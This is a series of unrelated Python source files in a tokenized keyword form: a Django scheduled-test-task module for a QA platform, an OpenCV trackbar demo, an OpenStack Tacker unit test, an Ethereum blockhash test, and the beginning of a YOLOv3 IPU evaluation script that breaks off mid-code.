module_name_dic)<block_end><block_end>count=len(results)<line_sep>task_info_list=[]<for_stmt>task tasks<block_start>task_dict=task2Dict(task)<line_sep>task_info_list.append(task_dict)<block_end>data=dataToJson(task_info_list)<line_sep><return>JsonResponse(get_ajax_msg(1 1 '获取任务列表成功' {'tasks':data 'count':count 'currPage':index 'envInfo':env_name_dic 'proInfo':project_name_dic 'moduleInfo':module_name_dic}))<block_end><block_end><def_stmt>task_create request<block_start><if_stmt>request.method<eq>'GET'<block_start><return>render(request 'api/task_new.html')<block_end><elif_stmt>request.user.has_perm(AUTH_ADD_TASK)<block_start><if_stmt>request.method<eq>'POST'<block_start>model_form=TaskModelForm(request.POST)<if_stmt>model_form.is_valid()<block_start>task_name=request.POST.get('task_name')<line_sep>env_id=request.POST.get('belong_env')<line_sep>project_id=request.POST.get('belong_project')<line_sep>module_id=request.POST.get('belong_module')<line_sep>emails=request.POST.get('receiver_email')<line_sep>start_time=datetime.datetime.fromtimestamp(int(request.POST.get('start_time'))/1000)<if_stmt>request.POST.get('is_loop')<eq>'true'<block_start>is_loop=<true><block_end><elif_stmt>request.POST.get('is_loop')<eq>'false'<block_start>is_loop=<false><block_end>interval_minute=request.POST.get('interval_minute')<line_sep>error_msg=<none><if_stmt><not>EnvInfo.objects.filter(id=env_id).exists()<block_start>error_msg='此环境不存在'<block_end><elif_stmt><not>ProjectInfo.objects.filter(id=project_id).exists()<block_start>error_msg='此项目不存在'<block_end><elif_stmt><not>ModuleInfo.objects.filter(id=module_id).exists()<block_start>error_msg='此模块不存在'<block_end><elif_stmt>TaskInfo.objects.filter(task_name=task_name 
belong_module_id=module_id).exists()<block_start>error_msg='已存在此任务'<block_end><elif_stmt>start_time<le>datetime.datetime.now()<block_start>error_msg='任务开始时间早于当前时间'<block_end><elif_stmt>is_loop<and>int(interval_minute)<l>1<block_start>error_msg='任务开始循环间隔时间不能小于1分钟'<block_end><elif_stmt><not>validate_emails(emails.split(';'))<block_start>error_msg='邮箱格式错误'<block_end><if_stmt>error_msg<is><not><none><block_start><return>JsonResponse(get_ajax_msg(0 0 error_msg {}))<block_end>model_form.instance.belong_env_id=env_id<line_sep>model_form.instance.belong_project_id=project_id<line_sep>model_form.instance.belong_module_id=module_id<line_sep>model_form.instance.start_time=start_time<line_sep>model_form.instance.receiver_email=deal_emails(emails.split(';'))<line_sep>model_form.save()<for_stmt>case_id request.POST.get('case_list').split(',')<block_start>task=TaskInfo.objects.get(task_name=request.POST.get('task_name'))<line_sep>case=TestCaseInfo.objects.get(id=case_id)<line_sep>task.cases.add(case)<block_end><return>JsonResponse(get_ajax_msg(1 1 '添加任务成功' {}))<block_end><else_stmt><block_start>msg=get_validate_form_msg(model_form)<line_sep><return>JsonResponse(get_ajax_msg(0 0 msg))<block_end><block_end><block_end><else_stmt><block_start><return>JsonResponse(get_ajax_msg(0 0 '用户没有创建任务的权限'))<block_end><block_end><def_stmt>task_search request<block_start><if_stmt>request.method<eq>'POST'<block_start>index=int(request.POST.get('index'))<line_sep>task_name=request.POST.get('task_name')<line_sep>project_name=request.POST.get('project_name')<line_sep>module_name=request.POST.get('module_name')<line_sep>tasks=<none><line_sep>env_name_dic={}<line_sep>project_name_dic={}<line_sep>module_name_dic={}<line_sep>count=0<if_stmt>len(task_name)<eq>0<and>len(project_name)<eq>0<and>len(module_name)<eq>0<block_start><return>JsonResponse(get_ajax_msg(0 0 '搜索条件无效'))<block_end><else_stmt><block_start>tasks=TaskInfo.objects.all()<if_stmt>len(module_name)<ne>0<and>module_name<ne>'模块名称'<block_start>tasks=tasks.filter(belong_module__module_name__contains=module_name)<block_end><if_stmt>len(project_name)<ne>0<and>project_name<ne>'项目名称'<block_start>tasks=tasks.filter(belong_project__project_name__contains=project_name)<block_end><if_stmt>len(task_name)<ne>0<block_start>tasks=tasks.filter(task_name__contains=task_name)<block_end><block_end><if_stmt>tasks<eq><none><block_start><return>JsonResponse(get_ajax_msg(0 0 '查询出错'))<block_end><if_stmt>tasks<ne><none><and>len(tasks)<g>0<block_start>tasks=filter_tasks_for_user(request.user tasks.order_by('-id') AUTH_VIEW)# 根据用户权限筛选模块 <for_stmt>task tasks<block_start>append_env_dict(task env_name_dic)<line_sep>append_project_dict(task project_name_dic)<line_sep>append_module_dict(task module_name_dic)<block_end><block_end>count=len(tasks)<line_sep>tasks=pagination_for_objects(tasks index)<line_sep>task_info_list=[]<for_stmt>task tasks<block_start>task_dict=task2Dict(task)<line_sep>task_info_list.append(task_dict)<block_end>data=dataToJson(task_info_list)<line_sep><return>JsonResponse(get_ajax_msg(1 1 '搜索成功' {'tasks':data 'count':count 'currPage':index 'envInfo':env_name_dic 'proInfo':project_name_dic 'moduleInfo':module_name_dic}))<block_end><block_end><def_stmt>task_delete request<block_start><if_stmt>request.method<eq>'POST'<block_start>task_id=request.POST.get('id')<line_sep>tasks=TaskInfo.objects.filter(id=task_id)<if_stmt>len(tasks)<eq>0<block_start><return>JsonResponse(get_ajax_msg(0 0 '没有这条数据' {}))<block_end><if_stmt>check_perm(request.user tasks[0] 
AUTH_DELETE)<block_start>tasks[0].delete()<line_sep><return>JsonResponse(get_ajax_msg(1 1 '删除成功' {}))<block_end><else_stmt><block_start><return>JsonResponse(get_ajax_msg(0 0 '用户没有删除该任务的权限'))<block_end><block_end><block_end><def_stmt>task_query request<block_start><if_stmt>request.method<eq>'POST'<block_start>task_id=request.POST.get('id')<line_sep>tasks=TaskInfo.objects.filter(id=task_id)<if_stmt>len(tasks)<eq>0<block_start><return>JsonResponse(get_ajax_msg(0 0 '没有这条数据' {}))<block_end>tasks=filter_tasks_for_user(request.user tasks AUTH_VIEW)<line_sep>task_info_list=[]<for_stmt>task tasks<block_start>task_dict=task2Dict(task)<line_sep>task_info_list.append(task_dict)<block_end>data=dataToJson(task_info_list)<line_sep><return>JsonResponse(get_ajax_msg(1 1 '获取任务成功' {'tasks':data}))<block_end><block_end><def_stmt>task_update request<block_start><if_stmt>request.method<eq>'POST'<block_start>task_form=TaskModelForm(request.POST)<if_stmt>task_form.is_valid()<block_start>task_id=request.POST.get('id')<line_sep>task_name=request.POST.get('task_name')<line_sep>env_name=request.POST.get('env_name')<line_sep>project_name=request.POST.get('project_name')<line_sep>module_name=request.POST.get('module_name')<line_sep>receiver_email=request.POST.get('receiver_email')<line_sep>case_list=request.POST.get('case_list').split(',')<line_sep>start_time=datetime.datetime.fromtimestamp(int(request.POST.get('start_time'))/1000)<line_sep>interval_minute=request.POST.get('interval_minute')<if_stmt>request.POST.get('is_loop')<eq>'true'<block_start>is_loop=<true><if_stmt>int(interval_minute)<l>1<block_start><return>JsonResponse(get_ajax_msg(0 0 '循环间隔时间不能小于1分钟' {}))<block_end><block_end><elif_stmt>request.POST.get('is_loop')<eq>'false'<block_start>is_loop=<false><block_end><if_stmt>start_time<le>datetime.datetime.now()<block_start>start_time=datetime.datetime.now()<line_sep># return JsonResponse(get_ajax_msg(0, 0, '任务开始时间早于当前时间', {})) <block_end><if_stmt><not>validate_emails(receiver_email.split(';'))<block_start><return>JsonResponse(get_ajax_msg(0 0 '邮箱格式错误'))<block_end># print(deal_emails(receiver_email.split(';'))) <try_stmt><block_start>task=TaskInfo.objects.get(id=task_id)<if_stmt>TaskInfo.objects.filter(task_name=task_name belong_module_id=module_name).exclude(id=task_id).exists()<block_start><return>JsonResponse(get_ajax_msg(0 0 '已存在此任务名称' {}))<block_end><if_stmt><not>task.is_run<block_start><if_stmt>check_perm(request.user TaskInfo.objects.get(id=task_id) AUTH_UPDATE)<block_start><if_stmt>TaskInfo.objects.update_task(task_id task_name=task_name env_name=env_name project_name=project_name module_name=module_name receiver_email=deal_emails(receiver_email.split(';')) case_list=case_list start_time=start_time is_loop=is_loop interval_minute=interval_minute)<block_start><return>JsonResponse(get_ajax_msg(1 1 '修改任务成功' {}))<block_end><else_stmt><block_start><return>JsonResponse(get_ajax_msg(0 0 '修改任务失败' {}))<block_end><block_end><else_stmt><block_start><return>JsonResponse(get_ajax_msg(0 0 '用户没有修改该任务的权限'))<block_end><block_end><else_stmt><block_start><return>JsonResponse(get_ajax_msg(0 0 '请先停止任务' {}))<block_end><block_end><except_stmt><block_start><return>JsonResponse(get_ajax_msg(0 0 '该任务不存在' {}))<block_end><block_end><else_stmt><block_start>msg=get_validate_form_msg(task_form)<line_sep><return>JsonResponse(get_ajax_msg(0 1 msg))<block_end><block_end><block_end><def_stmt>task_run 
request<block_start><global>is_timer_start<line_sep><global>run_task_list<line_sep><global>run_job_dict<if_stmt>request.method<eq>'POST'<block_start>task_id=request.POST.get('id')<line_sep>tasks=TaskInfo.objects.filter(id=task_id)<if_stmt>len(tasks)<eq>0<block_start><return>JsonResponse(get_ajax_msg(0 0 '没有这条数据' {}))<block_end>task=tasks[0]<if_stmt><not>task.is_run<block_start><if_stmt>task.start_time<g>datetime.datetime.now()# 任务开始时间必须大于当前时间 <block_start><pass><block_end><else_stmt><block_start>task.start_time=datetime.datetime.now()+datetime.timedelta(seconds=10)<block_end># if not is_timer_start: # is_timer_start = True # start_task_timer = StartTaskTimer(run_task_list, run_job_dict) # start_task_timer.start() run_task_list.append(task)<line_sep>task.is_run=<true><line_sep>task.save()<line_sep>connection.close()<line_sep><return>JsonResponse(get_ajax_msg(1 1 '该任务成功运行'))<block_end><else_stmt><block_start>connection.close()<line_sep><return>JsonResponse(get_ajax_msg(0 0 '该任务正在运行'))<block_end><block_end><block_end><def_stmt>task_stop request<block_start><global>run_task_list<line_sep><global>run_job_dict<if_stmt>request.method<eq>'POST'<block_start>task_id=request.POST.get('id')<line_sep>tasks=TaskInfo.objects.filter(id=task_id)<if_stmt>len(tasks)<eq>0<block_start><return>JsonResponse(get_ajax_msg(0 0 '没有这条数据' {}))<block_end>task=tasks[0]<if_stmt>task.is_run<block_start>task.is_run=<false><line_sep>task.fail_times=0<line_sep>task.save()<line_sep># if task in run_task_list: # run_task_list.remove(task) # 从运行任务列表中删除该任务 <try_stmt># jobs = run_job_dict[task.id] # for job in jobs: <block_start>schedule.cancel_job(task.id)<block_end><except_stmt>KeyError<block_start>print('非循环任务')<block_end><return>JsonResponse(get_ajax_msg(1 1 '该任务成功停止'))<block_end><else_stmt><block_start><return>JsonResponse(get_ajax_msg(0 0 '该任务没有运行'))<block_end><block_end><block_end><def_stmt>task_monitor request<block_start><if_stmt>request.method<eq>'GET'<block_start><return>render(request 'api/task_monitor.html')<block_end><if_stmt>request.method<eq>'POST'<block_start>index=int(request.POST.get('index'))<line_sep>search_task_name=request.POST.get('task_name')<line_sep>start=(index-1)<times>10<line_sep>res=requests.get('http://127.0.0.1:5555/api/tasks?limit=1000')# 控制查询最大数目为1000,以解决查询卡顿的问题 results=json.loads(res.content)<line_sep>monitor_result_list=[]<for_stmt>result results.values()<block_start><try_stmt><block_start>task_dict={}<line_sep>args=result['args'].split(',')<line_sep># 获取任务信息 infos=args[1].split('-')<if_stmt>'定时任务'<in>infos[0]<block_start>task_name=infos[1]<line_sep>case_name=infos[2]<line_sep>report_uuid=args[4].split("'")[1]<line_sep>task_dict['task_name']=task_name<line_sep>task_dict['case_name']=case_name<line_sep>task_dict['state']=result['state']<line_sep>task_dict['result']=result['result']<line_sep>task_dict['received']=result['received']<line_sep>task_dict['started']=result['started']<line_sep>task_dict['runtime']=result['runtime']<line_sep>task_dict['report_uuid']=report_uuid<if_stmt>search_task_name<is><not><none><block_start><if_stmt>search_task_name<in>task_dict['task_name']<block_start>monitor_result_list.append(task_dict)<block_end><block_end><else_stmt><block_start>monitor_result_list.append(task_dict)<block_end><block_end><block_end><except_stmt>Exception<as>e<block_start>print('数据解析异常:'+e)<block_end><block_end># 根据任务开始时间降序排列 <for_stmt>i range(len(monitor_result_list)-1)<block_start><for_stmt>j 
range(len(monitor_result_list)-i-1)<block_start><if_stmt>monitor_result_list[j]['received']<l>monitor_result_list[j+1]['received']<block_start>monitor_result_list[j],monitor_result_list[j+1]=monitor_result_list[j+1] monitor_result_list[j]<block_end><block_end><block_end>data=dataToJson(monitor_result_list[start:start+10])<line_sep><return>JsonResponse(get_ajax_msg(1 1 '获取监控任务列表成功' {'monitors':data 'count':len(monitor_result_list) 'currPage':index}))<block_end><block_end><def_stmt>thread_run_case **kwargs<block_start>case_id=kwargs['case_id']<line_sep>base_url=kwargs['base_url']<line_sep>task_name=kwargs['task_name']<line_sep>task_id=kwargs['task_id']<line_sep>threading.Thread(target=run_case args=(base_url case_id task_name task_id)).start()<block_end><def_stmt>run_case base_url case_id task_name task_id<block_start>report_id=run_case_by_id(base_url case_id task_name "定时任务" isTask=<true>)<line_sep>time.sleep(5)# 等待报告信息写入数据库 reports=ReportInfo.objects.all().filter(report_id=report_id)<line_sep>tasks=TaskInfo.objects.filter(id=task_id)<if_stmt>len(tasks)<g>0<block_start>task=tasks[0]<block_end><if_stmt>len(reports)<eq>0# 若没有此条报告,则认为用例成功,不再需要后续操作 <block_start><if_stmt>len(tasks)<g>0<block_start>task.fail_times=0<line_sep>task.save()<block_end><block_end><else_stmt><block_start>response_result=get_response_result(report_id)<if_stmt>response_result<ne><true><block_start>task.fail_times<augadd>1<line_sep>task.save()<line_sep># 存失败记录 failRecord=TaskFailedRecord(task_id=task report_id=reports[0].id time=datetime.datetime.fromtimestamp(reports[0].test_time))<line_sep>failRecord.save()<block_end><if_stmt>task.fail_times%2<eq>0<and>task.fail_times<ne>0<block_start>receivers=task.receiver_email.split(';')<for_stmt>receiver receivers<block_start>send_warn_mail(task_name receiver reports[0].id)<block_end><block_end><block_end>connection.close()<block_end># 避免造成mysql连接数过多的问题 <def_stmt>get_response_result report_id<block_start>response_result=<true><try_stmt><block_start>reports=ReportInfo.objects.all().filter(report_id=report_id)<if_stmt>len(reports)<g>0<block_start>report=reports[0]<line_sep># print(report.result_data) summury=json.loads(report.result_data)<line_sep>stat=summury['stat']<if_stmt>stat['successes']<ne>stat['testsRun']<block_start>response_result=<false><block_end><block_end><block_end><except_stmt>Exception<as>e<block_start>print('get_response_code e=====>' e)<block_end><return>response_result<block_end><def_stmt>send_warn_mail task_name receiver report_id<block_start>tips=task_name+':监控到接口发生异常!查看报告地址:http://qa.15166.com/api/get_report/?id='+str(report_id)<try_stmt><block_start>email_title="Joy_QA_Platform 定时任务监控接口"<line_sep>email_body=tips<line_sep># 使用Django内置函数完成邮件发送。四个参数:主题,邮件内容,从哪里发,接受者list send_status=send_mail(email_title email_body EMAIL_FROM [receiver])<block_end><except_stmt>Exception<as>e<block_start>print(e)<block_end><block_end><def_stmt>task2Dict 
task<block_start>task_dict={}<line_sep>task_dict["id"]=task.id<line_sep>task_dict["task_name"]=task.task_name<line_sep>task_dict["belong_env"]=task.belong_env_id<line_sep>task_dict["belong_project"]=task.belong_project_id<line_sep>task_dict["belong_module"]=task.belong_module_id<line_sep>task_dict["receiver_email"]=task.receiver_email<line_sep>task_dict["case_id_list"]=[]<line_sep>task_dict["case_name_list"]=[]<line_sep>task_dict["start_time"]=task.start_time<line_sep>task_dict["is_loop"]=task.is_loop<line_sep>task_dict["interval_minute"]=task.interval_minute<line_sep>task_dict["is_run"]=task.is_run<line_sep>task_dict["fail_times"]=task.fail_times<line_sep>cases=task.cases.all()<for_stmt>case cases<block_start>id=case.id<line_sep>task_dict["case_id_list"].append(case.id)<line_sep>task_dict["case_name_list"].append(case.name)<block_end><return>task_dict<block_end><def_stmt>append_env_dict task env_dict<block_start>env_id=task.belong_env_id<line_sep>env_name=task.belong_env.env_name<line_sep>env_dict[str(env_id)]=env_name<block_end><def_stmt>append_project_dict task project_dict<block_start>project_id=task.belong_project_id<line_sep>project_name=task.belong_project.project_name<line_sep>project_dict[str(project_id)]=project_name<block_end><def_stmt>append_module_dict task module_dict<block_start>module_id=task.belong_module_id<line_sep>module_name=task.belong_module.module_name<line_sep>module_dict[str(module_id)]=module_name<block_end><def_stmt>get_url_from_task task<block_start>envs=EnvInfo.objects.filter(id=task.belong_env_id)<line_sep>env=envs[0]<line_sep><return>env.host_port<block_end><class_stmt>StartTaskTimer(threading.Thread)<block_start><def_stmt>__init__ self run_task_list run_job_dict<block_start>threading.Thread.__init__(self)<line_sep>self.run_task_list=run_task_list<line_sep>self.run_job_dict=run_job_dict<block_end><def_stmt>run self<block_start><while_stmt><true># lst = self.run_task_list[::] <block_start>tasks=get_running_tasks()<for_stmt>task tasks<block_start>now=datetime.datetime.now()<if_stmt>task.start_time<le>now<le>(task.start_time+datetime.timedelta(seconds=5))<block_start><if_stmt>task.is_loop<block_start>self.run_job_dict[task.id]=start_loop_task(task thread_run_case)<block_end><else_stmt><block_start>start_task(task thread_run_case)<line_sep>task.is_run=<false><line_sep>task.fail_times=0<line_sep>task.save()<line_sep># self.run_task_list.remove(task) <block_end><block_end><else_stmt><block_start><pass><block_end><block_end>time.sleep(5)<block_end><block_end><block_end>mutex=threading.Lock()<def_stmt>get_running_tasks <block_start><global>mutex<with_stmt>mutex<block_start>result=[]<line_sep>tasks=TaskInfo.objects.filter(is_run=<true> is_loop=<true>)<line_sep>now=datetime.datetime.now()<for_stmt>task tasks# 排除可能的重复执行 <block_start><if_stmt>task.start_time<le>now<le>(task.start_time+datetime.timedelta(seconds=5))<and>(now-task.last_run_time<g>datetime.timedelta(seconds=5))<block_start>result.append(task)<line_sep>task.last_run_time=now<line_sep>task.save()<block_end># if datetime.datetime.now() - task.last_run_time > datetime.timedelta(seconds=task.interval_minute * 60 - 5): # result.append(task) <block_end>connection.close()<if_stmt>len(result)<g>0<block_start><for_stmt>i result<block_start>print("获取到任务:" i.task_name)<block_end><block_end><return>result<block_end><block_end><def_stmt>start_loop_task task func<block_start>base_url=get_url_from_task(task)<line_sep>jobs=[]<line_sep>cases=task.cases.all()<for_stmt>case cases<block_start>task_name=get_task_name(task 
case)<line_sep>func(case_id=case.id base_url=base_url task_name=task_name task_id=task.id)<line_sep>job=schedule.every(task.interval_minute).minutes.do(thread_run_case case_id=case.id base_url=base_url task_name=task_name task_id=task.id)<line_sep>cache.set("qa_paltform_loop_jobs_"+str(datetime.datetime.now()) pickle.dumps(job) timeout=<none>)<block_end>flag=cache.get("qa_test_platform_running_flag")<line_sep># print("flag==="+str(flag)) <if_stmt>flag<ne>1<block_start>schedule.run_continuously()<line_sep># 一定要添加过期时间,否则当值过期时还会起新的线程(发现默认过期时间5分钟,这是django-redis组件和原生redis的区别) cache.set("qa_test_platform_running_flag" 1 timeout=<none>)<block_end><return>jobs<block_end><def_stmt>start_task task func<block_start>base_url=get_url_from_task(task)<line_sep>cases=task.cases.all()<for_stmt>case cases<block_start>task_name=get_task_name(task case)<line_sep>func(case_id=case.id base_url=base_url task_name=task_name task_id=task.id)<block_end><block_end><def_stmt>get_task_name task case<block_start>name='定时任务'+'-'+task.task_name+'-'+case.name<line_sep><return>name<block_end><def_stmt>filter_tasks_for_user user tasks perm<block_start>results=[]<for_stmt>task tasks<block_start>project=task.belong_project<if_stmt>user.has_perm(perm project)<block_start>results.append(task)<block_end><block_end><return>results<block_end><def_stmt>check_perm user task perm<block_start>project=task.belong_project<line_sep><return>user.has_perm(perm project)<block_end><def_stmt>restart_running_task # 清除redis中的任务缓存 <block_start>cache.delete_pattern("qa_paltform_loop_jobs_*")<line_sep># 清除redis中的分布式锁,避免偶发的锁出现问题,任务会在执行器中的run_pending阻塞 cache.delete_pattern('*qa_test_platform_get')<line_sep># 增加是否已经启动了线程的标记,避免每增加一个执行任务就启动一次线程,可能导致任务重复执行 cache.delete_pattern('qa_test_platform_running_flag')<line_sep>print("清除任务缓存、清除锁、清除线程启动标记")<line_sep>start_task_timer=StartTaskTimer(run_task_list run_job_dict)<line_sep>start_task_timer.start()<line_sep>tasks=TaskInfo.objects.filter(is_run=<true> is_loop=<true>)<line_sep>count=0<for_stmt>task tasks<block_start>task.start_time=datetime.datetime.now()+datetime.timedelta(seconds=10<times>(count+1))<line_sep>task.save()<line_sep>count=count+1<block_end>connection.close()<block_end># 避免造成mysql连接数过多的问题 <def_stmt>validate_emails emails<block_start><for_stmt>email emails<block_start><if_stmt>len(email)<eq>0<block_start><continue><block_end><if_stmt>re.match("^[A-Z0-9a-z._%+-]+"+EMAIL_SUFFIX email)<is><none><block_start><return><false><block_end><block_end><return><true><block_end><def_stmt>deal_emails emails<block_start>result=[]<for_stmt>email emails<block_start><if_stmt>email<not><in>result<block_start>result.append(email)<block_end><block_end>resultEmail=""<for_stmt>email result<block_start>resultEmail=resultEmail+";"+email<block_end><return>resultEmail[1:]<block_end>
#coding=utf-8 #color palette <import_stmt>cv2<import_stmt>numpy<as>np<line_sep>img=np.zeros((300 512 3) np.uint8)<line_sep>cv2.namedWindow('image')<def_stmt>callback x<block_start><pass><block_end>#arg 1: trackbar name; arg 2: target window; args 3 and 4: min and max values; arg 5: callback invoked when the value changes cv2.createTrackbar('R' 'image' 0 255 callback)<line_sep>cv2.createTrackbar('G' 'image' 0 255 callback)<line_sep>cv2.createTrackbar('B' 'image' 0 255 callback)<while_stmt>(1)<block_start>cv2.imshow('image' img)<if_stmt>cv2.waitKey(1)&0xFF<eq>ord('q')<block_start><break><block_end>r=cv2.getTrackbarPos('R' 'image')<line_sep>g=cv2.getTrackbarPos('G' 'image')<line_sep>b=cv2.getTrackbarPos('B' 'image')<line_sep>img[:]=[b g r]<block_end>cv2.destroyAllWindows()<line_sep>
# Copyright (c) 2014-2018 China Mobile (SuZhou) Software Technology Co.,Ltd. # All Rights Reserved # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. <import_stmt>testtools<import_from_stmt>unittest mock<import_from_stmt>tacker.common clients<import_from_stmt>tacker context<import_from_stmt>tacker.db.common_services common_services_db_plugin<import_from_stmt>tacker.plugins.common constants<import_from_stmt>tacker.vnfm.infra_drivers.openstack heat_client<as>hc<import_from_stmt>tacker.vnfm.policy_actions.respawn respawn<as>policy_actions_respawn<import_from_stmt>tacker.vnfm vim_client<class_stmt>VNFActionRespawn(testtools.TestCase)<block_start><def_stmt>setUp self<block_start>super(VNFActionRespawn self).setUp()<line_sep>self.context=context.get_admin_context()<line_sep>mock.patch('tacker.db.common_services.common_services_db_plugin.'<concat>'CommonServicesPluginDb.create_event').start()<line_sep>self._cos_db_plugin=common_services_db_plugin.CommonServicesPluginDb()<block_end>@mock.patch.object(clients.OpenstackClients 'heat')@mock.patch.object(hc.HeatClient 'delete')@mock.patch.object(vim_client.VimClient 'get_vim')<def_stmt>test_execute_action self mock_get_vim mock_hc_delete mock_heat<block_start>action_respawn=policy_actions_respawn.VNFActionRespawn()<line_sep>vnf_dict={'id':'fake-id' 'status':'fake-status' 'attributes':{'monitoring_policy':'fake-monitoring-policy' 'failure_count':'1' 'dead_instance_id_1':'00000000-0000-0000-0000-00000000001'} 'vim_id':'fake-vim-id' 'vim_auth':'fake-vim-auth' 'instance_id':'00000000-0000-0000-0000-000000000002' 'placement_attr':{'region_name':'fake-region-name'}}<line_sep>mock_get_vim.return_value={'vim_auth':{'auth_url':'http://fake-url/identity/v3'}}<line_sep>mock_hc_delete.return_value=<true><line_sep>plugin=mock.Mock()<line_sep>plugin._mark_vnf_dead.return_value=<true><line_sep>plugin.create_vnf_sync.return_value={'id':'fake-id'}<line_sep>plugin._vnf_monitor=mock.Mock()<line_sep>action_respawn.execute_action(plugin self.context vnf_dict <none>)<line_sep>self._cos_db_plugin.create_event.assert_called_once_with(self.context res_id=vnf_dict['id'] res_state=vnf_dict['status'] res_type=constants.RES_TYPE_VNF evt_type=constants.RES_EVT_MONITOR tstamp=mock.ANY details="ActionRespawnHeat invoked")<line_sep>mock_get_vim.assert_called_once_with(self.context vnf_dict['vim_id'])<line_sep>plugin.create_vnf_sync.assert_called_with(self.context vnf_dict)<line_sep>plugin._vnf_monitor.mark_dead.assert_called_once_with(vnf_dict['id'])<block_end><block_end>
<import_from_stmt>ethereum tester vm<import_from_stmt>ethereum.utils sha3 encode_int32 safe_ord encode_hex<import_from_stmt>ethereum.state_transition apply_message<line_sep>s=tester.state()<line_sep>c=s.contract('eip_96_blockhash_getter.se.py')<line_sep>blockhash_addr=b'\x00'<times>19+b'\x10'<line_sep>system_addr=b'\xff'<times>19+b'\xfe'<line_sep>s.state.set_code(blockhash_addr s.state.get_code(c))<def_stmt>mk_hash_setting_message data<block_start><return>vm.Message(sender=system_addr to=blockhash_addr value=0 gas=1000000 data=data)<block_end>print("Setting block hashes")<for_stmt>i range(1 1000)<block_start>s.state.block_number=i+1<line_sep>o=apply_message(s.state mk_hash_setting_message(sha3(str(i))))<if_stmt>i%100<eq>0<block_start>print("Set %d"%i)<block_end><block_end>print("Testing reads")<line_sep>s.state.block_number=1000<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(999))<eq>sha3(str(999))<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(998))<eq>sha3(str(998))<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(744))<eq>sha3(str(744))<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(743))<eq>b'\x00'<times>32<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(1000))<eq>b'\x00'<times>32<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(1001))<eq>b'\x00'<times>32<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(513))<eq>b'\x00'<times>32<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(512))<eq>sha3(str(512))<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(511))<eq>b'\x00'<times>32<assert_stmt>s.send(tester.k0 blockhash_addr 0 encode_int32(256))<eq>sha3(str(256))<line_sep>print("Tests passed!")<line_sep>print("EVM code: 0x%s"%encode_hex(s.state.get_code(blockhash_addr)))<line_sep>
#! /usr/bin/env python # coding=utf-8 # Copyright (c) 2021 Graphcore Ltd. All Rights Reserved. # Copyright (c) 2019 YunYang1994 <<EMAIL>> # License: MIT (https://opensource.org/licenses/MIT) # This file has been modified by Graphcore Ltd. <import_stmt>argparse<import_stmt>json<import_stmt>math<import_stmt>os<import_stmt>shutil<import_stmt>time<import_stmt>numpy<as>np<import_stmt>core.utils<as>utils<import_stmt>cv2<import_stmt>log<import_stmt>tensorflow<as>tf<import_from_stmt>core.dataset Dataset<import_from_stmt>core.yolov3 YOLOV3<import_from_stmt>ipu_utils stages_constructor<import_from_stmt>log logger<import_from_stmt>tensorflow.python ipu<import_from_stmt>tensorflow.python.ipu ipu_infeed_queue ipu_outfeed_queue loops<class_stmt>YoloTest(object)<block_start><def_stmt>__init__ self opts<block_start>self.input_size=opts["test"]["input_size"]<line_sep>self.classes=utils.read_class_names(opts["yolo"]["classes"])<line_sep>self.num_classes=len(self.classes)<line_sep>self.score_threshold=opts["test"]["score_threshold"]<line_sep>self.iou_threshold=opts["test"]["iou_threshold"]<line_sep>self.moving_avg_decay=opts["yolo"]["moving_avg_decay"]<line_sep>self.annotation_path=opts["test"]["annot_path"]<line_sep>self.weight_file=opts["test"]["weight_file"]<line_sep>self.write_image=opts["test"]["write_image"]<line_sep>self.write_image_path=opts["test"]["write_image_path"]<line_sep>self.show_label=opts["test"]["show_label"]<line_sep>self.batch_size=opts["test"]["batch_size"]<line_sep>self.precision=tf.float16<if>opts["yolo"]["precision"]<eq>"fp16"<else>tf.float32<line_sep>self.use_moving_avg=opts["yolo"]["use_moving_avg"]<line_sep>self.repeat_count=opts["test"]["repeat_count"]<line_sep>self.use_infeed_queue=opts["test"]["use_infeed_queue"]<line_sep>self.predicted_file_path=opts["test"]["predicted_file_path"]<line_sep>self.ground_truth_file_path=opts["test"]["ground_truth_file_path"]<line_sep>self.meta_dict={}<line_sep>self.testset=Dataset("test" opts)<line_sep># Configure arguments for targeting the IPU config=ipu.config.IPUConfig()<line_sep>config.auto_select_ipus=1<line_sep>config.configure_ipu_system()<line_sep>model=YOLOV3(<false> opts)<line_sep># construct the model # we will put the whole network on one IPU layers=[]<line_sep># build layer functions for backbone and upsample layers.extend(model.build_backbone())<line_sep># the last layer of darknet53 is a classification layer, so the backbone has 52 conv layers <assert_stmt>len(layers)<eq>52<line_sep>layers.extend(model.build_upsample())<line_sep># there are 25 conv layers if we count upsample as a conv layer <assert_stmt>len(layers)<eq>52+25<line_sep># the decoding layer and loss layer are always put on the last IPU layers.append(model.decode_boxes)<line_sep># reuse stages_constructor so we don't need to pass params by hand network_func=stages_constructor([layers] ["input_data" "nums"] ["pred_sbbox" "pred_mbbox" "pred_lbbox" "nums"])[0]<line_sep>input_shape=(self.batch_size self.input_size self.input_size 3)<line_sep>self.lines,self.image_dict=self.load_data()<if_stmt>self.use_infeed_queue# The dataset for feeding the graphs <block_start><def_stmt>data_gen <block_start><return>self.data_generator()<block_end><with_stmt>tf.device("cpu")<block_start>ds=tf.data.Dataset.from_generator(data_gen output_types=(tf.float16 tf.int32) output_shapes=(input_shape (self.batch_size )))<block_end>ds=ds.repeat()<line_sep>ds=ds.prefetch(self.repeat_count<times>10)<line_sep># The host side queues 
